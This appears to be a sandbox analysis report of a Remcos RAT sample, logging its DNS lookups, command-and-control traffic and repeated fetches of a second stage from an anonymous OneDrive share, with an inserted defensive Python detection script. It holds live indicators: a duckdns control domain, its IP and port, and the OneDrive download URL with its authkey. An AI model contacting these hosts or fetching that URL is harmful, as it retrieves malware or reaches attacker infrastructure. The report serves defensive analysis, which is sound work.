                                                                                                                                                  Apr 24, 2024 07:22:40.475543022 CEST4971480192.168.2.8178.237.33.50
                                                                                                                                                  Apr 24, 2024 07:23:03.835489988 CEST114449711103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:23:03.876585007 CEST497111144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:23:03.927098989 CEST497111144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:23:04.351584911 CEST114449711103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:23:33.868432999 CEST114449711103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:23:33.870100021 CEST497111144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:23:34.336030006 CEST114449711103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:24:03.886574030 CEST114449711103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:24:03.890141010 CEST497111144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:24:04.335995913 CEST114449711103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:24:33.914902925 CEST114449711103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:24:33.916168928 CEST497111144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:24:34.367285967 CEST114449711103.186.117.142192.168.2.8
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 24, 2024 07:20:30.036339998 CEST | 63777 | 53 | 192.168.2.8 | 1.1.1.1
Apr 24, 2024 07:20:32.007673025 CEST | 63178 | 53 | 192.168.2.8 | 1.1.1.1
Apr 24, 2024 07:20:40.180329084 CEST | 55699 | 53 | 192.168.2.8 | 1.1.1.1
Apr 24, 2024 07:20:40.413579941 CEST | 53 | 55699 | 1.1.1.1 | 192.168.2.8
Apr 24, 2024 07:20:41.787137032 CEST | 64652 | 53 | 192.168.2.8 | 1.1.1.1
Apr 24, 2024 07:20:41.944060087 CEST | 53 | 64652 | 1.1.1.1 | 192.168.2.8
Apr 24, 2024 07:20:54.909126043 CEST | 62744 | 53 | 192.168.2.8 | 1.1.1.1
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 24, 2024 07:20:30.036339998 CEST | 192.168.2.8 | 1.1.1.1 | 0x81c8 | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:20:32.007673025 CEST | 192.168.2.8 | 1.1.1.1 | 0x56bd | Standard query (0) | oqgp5g.db.files.1drv.com | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:20:40.180329084 CEST | 192.168.2.8 | 1.1.1.1 | 0x748f | Standard query (0) | oceansss.duckdns.org | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:20:41.787137032 CEST | 192.168.2.8 | 1.1.1.1 | 0x7113 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:20:54.909126043 CEST | 192.168.2.8 | 1.1.1.1 | 0xc8b6 | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 24, 2024 07:20:30.190764904 CEST | 1.1.1.1 | 192.168.2.8 | 0x81c8 | No error (0) | onedrive.live.com | web.fe.1drv.com |  | CNAME (Canonical name) | IN (0x0001) | false
Apr 24, 2024 07:20:30.190764904 CEST | 1.1.1.1 | 192.168.2.8 | 0x81c8 | No error (0) | web.fe.1drv.com | odc-web-geo.onedrive.akadns.net |  | CNAME (Canonical name) | IN (0x0001) | false
Apr 24, 2024 07:20:30.190764904 CEST | 1.1.1.1 | 192.168.2.8 | 0x81c8 | No error (0) | odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net | dual-spov-0006.spov-msedge.net |  | CNAME (Canonical name) | IN (0x0001) | false
Apr 24, 2024 07:20:30.190764904 CEST | 1.1.1.1 | 192.168.2.8 | 0x81c8 | No error (0) | dual-spov-0006.spov-msedge.net |  | 13.107.139.11 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:20:30.190764904 CEST | 1.1.1.1 | 192.168.2.8 | 0x81c8 | No error (0) | dual-spov-0006.spov-msedge.net |  | 13.107.137.11 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:20:32.219865084 CEST | 1.1.1.1 | 192.168.2.8 | 0x56bd | No error (0) | oqgp5g.db.files.1drv.com | db-files.fe.1drv.com |  | CNAME (Canonical name) | IN (0x0001) | false
Apr 24, 2024 07:20:32.219865084 CEST | 1.1.1.1 | 192.168.2.8 | 0x56bd | No error (0) | db-files.fe.1drv.com | odc-db-files-geo.onedrive.akadns.net |  | CNAME (Canonical name) | IN (0x0001) | false
Apr 24, 2024 07:20:40.413579941 CEST | 1.1.1.1 | 192.168.2.8 | 0x748f | No error (0) | oceansss.duckdns.org |  | 103.186.117.142 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:20:41.944060087 CEST | 1.1.1.1 | 192.168.2.8 | 0x7113 | No error (0) | geoplugin.net |  | 178.237.33.50 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:20:55.063916922 CEST | 1.1.1.1 | 192.168.2.8 | 0xc8b6 | No error (0) | onedrive.live.com | web.fe.1drv.com |  | CNAME (Canonical name) | IN (0x0001) | false
Apr 24, 2024 07:20:55.063916922 CEST | 1.1.1.1 | 192.168.2.8 | 0xc8b6 | No error (0) | web.fe.1drv.com | odc-web-geo.onedrive.akadns.net |  | CNAME (Canonical name) | IN (0x0001) | false
Apr 24, 2024 07:20:55.063916922 CEST | 1.1.1.1 | 192.168.2.8 | 0xc8b6 | No error (0) | odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net | dual-spov-0006.spov-msedge.net |  | CNAME (Canonical name) | IN (0x0001) | false
Apr 24, 2024 07:20:55.063916922 CEST | 1.1.1.1 | 192.168.2.8 | 0xc8b6 | No error (0) | dual-spov-0006.spov-msedge.net |  | 13.107.139.11 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:20:55.063916922 CEST | 1.1.1.1 | 192.168.2.8 | 0xc8b6 | No error (0) | dual-spov-0006.spov-msedge.net |  | 13.107.137.11 | A (IP address) | IN (0x0001) | false
• onedrive.live.com
• geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49714 | 178.237.33.50 | 80 | 908 | C:\ProgramData\Remcos\remcos.exe

Timestamp | Bytes transferred | Direction | Data
Apr 24, 2024 07:20:42.251774073 CEST | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Apr 24, 2024 07:20:42.562464952 CEST | 1173 | IN | HTTP/1.1 200 OK
date: Wed, 24 Apr 2024 05:20:42 GMT
server: Apache
content-length: 965
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4c 61 73 20 56 65 67 61 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 76 61 64 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 43 6f 64 65 22 3a 22 4e 56 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 76 61 64 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 61 72 65 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 6d 61 43 6f 64 65 22 3a 22 38 33 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 69 6e 45 55 22 3a 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 65 75 56 41 54 72 61 74 65 22 3a 66 61 6c 73 65 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 4e 41 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 61 74 69 74 75 64 65 22 3a 22 33 36 2e 31 36 38 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 31 31 35 2e 31 31 36 34 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 63 61 74 69 6f 6e 41 63 63 75 72 61 63 79 52 61 64 69 75 73 22 3a 22 32 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4c 6f 73 5f 41 6e 67 65 6c 65 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 5f 55 54 46 38 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 6e 76 65 72 74 65 72 22 3a 30 0a 7d
Data Ascii: { "geoplugin_request":"154.16.105.36", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Las Vegas", "geoplugin_region":"Nevada", "geoplugin_regionCode":"NV", "geoplugin_regionName":"Nevada", "geoplugin_areaCode":"", "geoplugin_dmaCode":"839", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"36.1685", "geoplugin_longitude":"-115.1164", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Los_Angeles", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49706 | 13.107.139.11 | 443 | 5592 | C:\Users\user\Desktop\fu56fbrtn8.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-24 05:20:30 UTC | 213 | OUT | GET /download?resid=FDB0512DE793B32E%21192&authkey=!AAbMANNKbvJdxgc HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: onedrive.live.com
2024-04-24 05:20:31 UTC | 1177 | IN | HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: -1
Location: https://oqgp5g.db.files.1drv.com/y4mcrmPTZ2L_86niwd7Bu_ffro-TLyMBDfLgpQuXM7S3NIuO87j54n8Dfi6-LFoUs3aCWaxPezvkh22sQYusA24g4qRSfjH6rPA6d_rKcDO9ItkzUtKMazypuFb38jsZrqn0GX_ayYxBqveq8QUWF1JurrQ6nvBAIZ5DDEPoBOBX3lxu5McRcV9OYrjq0-pUI7JlrssrLs3927EUGoGb2Ah_w/255_Cmzcxhwnqpl?download&psid=1
Set-Cookie: E=P:FaCiQh5k3Ig=:SkD8DkOxxn1UyIdgoBJLut/opsEYmHvMHQSbc3z3T/w=:F; domain=.live.com; path=/
Set-Cookie: xid=493f9b13-5614-4d32-9cc7-4a451fc95e95&&ODSP-ODWEB-ODCF&152; domain=.live.com; path=/
Set-Cookie: xidseq=1; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Wed, 24-Apr-2024 03:40:30 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Wed, 01-May-2024 05:20:31 GMT; path=/
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
X-MSNServer: 57d8d6c5b8-24zhh
X-ODWebServer: namsouthce375367-odwebpl
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: 86F9EA81BD1B4A1EAF42F535C6DC0324 Ref B: BY3EDGE0317 Ref C: 2024-04-24T05:20:30Z
Date: Wed, 24 Apr 2024 05:20:31 GMT
Connection: close
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49709 | 13.107.139.11 | 443 | 908 | C:\ProgramData\Remcos\remcos.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-24 05:20:36 UTC | 213 | OUT | GET /download?resid=FDB0512DE793B32E%21192&authkey=!AAbMANNKbvJdxgc HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: onedrive.live.com
2024-04-24 05:20:37 UTC | 1177 | IN | HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: -1
Location: https://oqgp5g.db.files.1drv.com/y4mzx7lSeeAwusg9Zi636Xfs7GnQpJEFwP-ghRD9wO-49fLPVE-Xv-39OCRs6SS43X7-okDI7Olrq16Bl86hXG7OLLTiDwyvt4fGsk-mimS9Snw5AK8Mtes9Kd7b93nvZTI0-UjhUUJjUprwlrU_sawWX38w11IDy8wt1jKktGPK66TqRMrtC8zkWp69lfqYajj_w42k9XHWu-GxLuEgxcgNQ/255_Cmzcxhwnqpl?download&psid=1
Set-Cookie: E=P:5pxLRh5k3Ig=:qzsAHQBeECv5Pb4uAHXlFzH/C6exPV/pM810HvunbNg=:F; domain=.live.com; path=/
Set-Cookie: xid=d079e555-187e-4608-98a2-77d21b0733c6&&ODSP-ODWEB-ODCF&152; domain=.live.com; path=/
Set-Cookie: xidseq=1; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Wed, 24-Apr-2024 03:40:37 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Wed, 01-May-2024 05:20:37 GMT; path=/
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
X-MSNServer: 58656754b6-2st64
X-ODWebServer: namsouthce155880-odwebpl
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: EB5578D06186455FA8DE44BA33B2093C Ref B: BY3EDGE0208 Ref C: 2024-04-24T05:20:37Z
Date: Wed, 24 Apr 2024 05:20:37 GMT
Connection: close
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49719 | 13.107.139.11 | 443 | 4424 | C:\ProgramData\Remcos\remcos.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-24 05:20:55 UTC | 213 | OUT | GET /download?resid=FDB0512DE793B32E%21192&authkey=!AAbMANNKbvJdxgc HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: onedrive.live.com
2024-04-24 05:20:56 UTC | 1177 | IN | HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: -1
Location: https://oqgp5g.db.files.1drv.com/y4msMUOKNxzSXc79LnjXbgaTWjPZ-zo_lPFnd-m9JJcIecYw2VkvQ1RrP2qqhLCejblYHxYKxBLzwqLPQ2czzOzs0GNLn99ovlgr_yo0ti0BE0e7e3seMb2l_SL4Mpo8R0C7rtl432UVYzlkwyPqRdW72hV7iQBMhmTQ-1XcazS5RHo-hfaTq89m25QrufiGRyrjj06NDCMRB3UpXIkhYGzgA/255_Cmzcxhwnqpl?download&psid=1
Set-Cookie: E=P:NJpyUR5k3Ig=:QJraFD9yl//VyTJTsXRCUCOxiLZzixPUDc4LUeQM8b8=:F; domain=.live.com; path=/
Set-Cookie: xid=cdce3314-fc6c-4371-af66-77784ad3f9de&&ODSP-ODWEB-ODCF&152; domain=.live.com; path=/
Set-Cookie: xidseq=1; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Wed, 24-Apr-2024 03:40:55 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Wed, 01-May-2024 05:20:56 GMT; path=/
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
X-MSNServer: 57d8d6c5b8-24zhh
X-ODWebServer: namsouthce375367-odwebpl
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: 14E0F061C4C64A9C8D1815FCDACBA23F Ref B: BY3EDGE0105 Ref C: 2024-04-24T05:20:55Z
Date: Wed, 24 Apr 2024 05:20:55 GMT
Connection: close
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49722 | 13.107.139.11 | 443 | 6012 | C:\ProgramData\Remcos\remcos.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-24 05:21:04 UTC | 213 | OUT | GET /download?resid=FDB0512DE793B32E%21192&authkey=!AAbMANNKbvJdxgc HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: onedrive.live.com
2024-04-24 05:21:05 UTC | 1177 | IN | HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: -1
Location: https://oqgp5g.db.files.1drv.com/y4mMFFkYYwN0t0OSAIBWRwi6fQ3Q4XNZ5ZTI7CjrOq6bQT78Okek-WvtG9h-If59Adwa3g_ERFMT3g_pkY8DxKVxpgvcmTbbSsgspUPsoIt78gOYIDqmsYL11yofEsVqT24H_yKT8DJjuTXBhcSjVy59OeC_x64QCJ1auH-yCJR3-mLHCVsQ-tdwq_kuRkJQiF38BIxb_gvon1e0GbfFF-I2A/255_Cmzcxhwnqpl?download&psid=1
Set-Cookie: E=P:fXe5Vh5k3Ig=:FS8Eep6VPPt2dJZ6e2KiYyoIYI6PKhXYL+9Ldgdg7Ks=:F; domain=.live.com; path=/
Set-Cookie: xid=b6034e4a-38d6-4597-9a6d-6e6791af3031&&ODSP-ODWEB-ODCF&152; domain=.live.com; path=/
Set-Cookie: xidseq=1; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Wed, 24-Apr-2024 03:41:04 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Wed, 01-May-2024 05:21:05 GMT; path=/
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
X-MSNServer: 58656754b6-9ndlp
X-ODWebServer: namsouthce155880-odwebpl
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: 4C912B0F20B24B47BE3D4B6AB73B1784 Ref B: BY3EDGE0217 Ref C: 2024-04-24T05:21:04Z
Date: Wed, 24 Apr 2024 05:21:04 GMT
Connection: close
Content-Length: 0


                                                                                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                   4 | 192.168.2.8 | 49725 | 13.107.139.11 | 443 | 4692 | C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                   2024-04-24 05:21:21 UTC | 213 | OUT | GET /download?resid=FDB0512DE793B32E%21192&authkey=!AAbMANNKbvJdxgc HTTP/1.1
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Accept: */*
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                  Host: onedrive.live.com
                                                                                                                                                   2024-04-24 05:21:22 UTC | 1177 | IN | HTTP/1.1 302 Found
                                                                                                                                                  Cache-Control: no-cache, no-store
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Expires: -1
                                                                                                                                                  Location: https://oqgp5g.db.files.1drv.com/y4mBqG2XWpzBzSvN2kPaNUx-09fMnbsE2AbR6Fc3TpLJhs6tiT5fqXCxcWK4x989O9Y8mAx3YKIC-W6yq19qfMjzJ-yb8EpydNlskmORiNNEm7URZdVa8SsLGyLiss_iT9mDT9DNyO1XRNVuT0oUWYVanF4hmAqguKLtst5u_uO7qyQrsOsY9SEMT6U9Ki0TuRdXbsktUDPvGCL3ban81vgTQ/255_Cmzcxhwnqpl?download&psid=1
                                                                                                                                                  Set-Cookie: E=P:neP2YB5k3Ig=:HSWruXJqycz2tSB7VRsG9yE0kMr0N2hRjg6NkdcT10o=:F; domain=.live.com; path=/
                                                                                                                                                  Set-Cookie: xid=6c2ece84-f7b4-48f3-9c18-7c471a6fdfc7&&ODSP-ODWEB-ODCF&152; domain=.live.com; path=/
                                                                                                                                                  Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                                                  Set-Cookie: LD=; domain=.live.com; expires=Wed, 24-Apr-2024 03:41:21 GMT; path=/
                                                                                                                                                  Set-Cookie: wla42=; domain=live.com; expires=Wed, 01-May-2024 05:21:22 GMT; path=/
                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                  X-MSNServer: 58656754b6-zqvx2
                                                                                                                                                  X-ODWebServer: namsouthce155880-odwebpl
                                                                                                                                                  X-Cache: CONFIG_NOCACHE
                                                                                                                                                  X-MSEdge-Ref: Ref A: D4576259DED54BABAD60C3EFA9D68174 Ref B: BY3EDGE0509 Ref C: 2024-04-24T05:21:21Z
                                                                                                                                                  Date: Wed, 24 Apr 2024 05:21:22 GMT
                                                                                                                                                  Connection: close
                                                                                                                                                  Content-Length: 0
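The session above is the implant, running from C:\ProgramData, fetching a second stage from an anonymous OneDrive share with the WinHttp.WinHttpRequest.5 user agent and being bounced to a files.1drv.com CDN host. The following is an added detection example, not Joe Sandbox code: it parses sandbox-style HTTP records constructed from this capture (the Location URL is shortened) and reports the three indicators a responder would pivot on. The directory list and user-agent pattern are assumptions chosen for this example.

```python
"""Flag the OneDrive payload fetch seen in the sandbox HTTP log (added example)."""
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse, parse_qs


@dataclass
class HttpRecord:
    process: str            # image path of the process that owns the socket
    direction: str          # "OUT" = request, "IN" = response
    raw: str                # start line followed by headers
    headers: dict = field(default_factory=dict)
    start_line: str = ""

    def __post_init__(self):
        lines = [l for l in self.raw.splitlines() if l.strip()]
        self.start_line = lines[0].strip()
        for line in lines[1:]:
            name, _, value = line.partition(":")
            self.headers[name.strip().lower()] = value.strip()


# Constructed from session 4 / PID 4692 above; Location shortened for readability.
SESSION = [
    HttpRecord(r"C:\ProgramData\Remcos\remcos.exe", "OUT",
               "GET /download?resid=FDB0512DE793B32E%21192&authkey=!AAbMANNKbvJdxgc HTTP/1.1\n"
               "Connection: Keep-Alive\nAccept: */*\n"
               "User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)\n"
               "Host: onedrive.live.com\n"),
    HttpRecord(r"C:\ProgramData\Remcos\remcos.exe", "IN",
               "HTTP/1.1 302 Found\nCache-Control: no-cache, no-store\n"
               "Location: https://oqgp5g.db.files.1drv.com/y4mBqG2XWpzBzSv/255_Cmzcxhwnqpl?download&psid=1\n"
               "Content-Length: 0\n"),
]

# Assumed: directories a real browser never runs from, and UA strings of scripted HTTP clients.
SUSPICIOUS_DIRS = ("c:\\programdata\\", "c:\\users\\public\\", "\\appdata\\local\\temp\\")
NON_BROWSER_UA = re.compile(r"WinHttp\.WinHttpRequest|Microsoft BITS", re.I)


def analyse(records):
    """Return human-readable findings for every request in the record list."""
    findings = []
    for i, rec in enumerate(records):
        if rec.direction != "OUT":
            continue
        _method, path, _version = rec.start_line.split(" ", 2)
        host = rec.headers.get("host", "")
        ua = rec.headers.get("user-agent", "")
        proc = rec.process.lower()

        # 1. Scripted HTTP client driven from a world-writable or staging directory.
        if any(d in proc for d in SUSPICIOUS_DIRS) and NON_BROWSER_UA.search(ua):
            findings.append(f"scripted HTTP client {ua!r} from {rec.process}")

        # 2. Anonymous OneDrive share download (resid + authkey) rather than a signed-in session.
        qs = parse_qs(urlparse(path).query)
        if host.endswith("onedrive.live.com") and path.startswith("/download") \
                and "resid" in qs and "authkey" in qs:
            findings.append(f"OneDrive anonymous share download resid={qs['resid'][0]}")

            # 3. Follow the redirect to learn where the bytes actually come from.
            nxt = records[i + 1] if i + 1 < len(records) else None
            if nxt and nxt.direction == "IN" and nxt.start_line.split()[1] in ("301", "302", "307"):
                loc = urlparse(nxt.headers.get("location", ""))
                if loc.hostname and loc.hostname.endswith(".files.1drv.com"):
                    blob = loc.path.rsplit("/", 1)[-1]
                    findings.append(f"redirected to CDN host {loc.hostname}; pivot on object {blob}")
    return findings


if __name__ == "__main__":
    for line in analyse(SESSION):
        print(line)
```

The resid value is the stable identifier for the share (the CDN hostname rotates), so that is the value to hunt on across other captures; the user-agent check is only meaningful when combined with the owning process path, since plenty of legitimate updaters also use WinHttpRequest.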


                                                                                                                                                  Target ID:0
                                                                                                                                                  Start time:07:20:28
                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                  Path:C:\Users\user\Desktop\fu56fbrtn8.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\Desktop\fu56fbrtn8.exe"
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                  MD5 hash:DA7C2473B5C455F25F420827AF596286
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1454185764.000000007E930000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1454185764.000000007E930000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1454185764.000000007E930000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
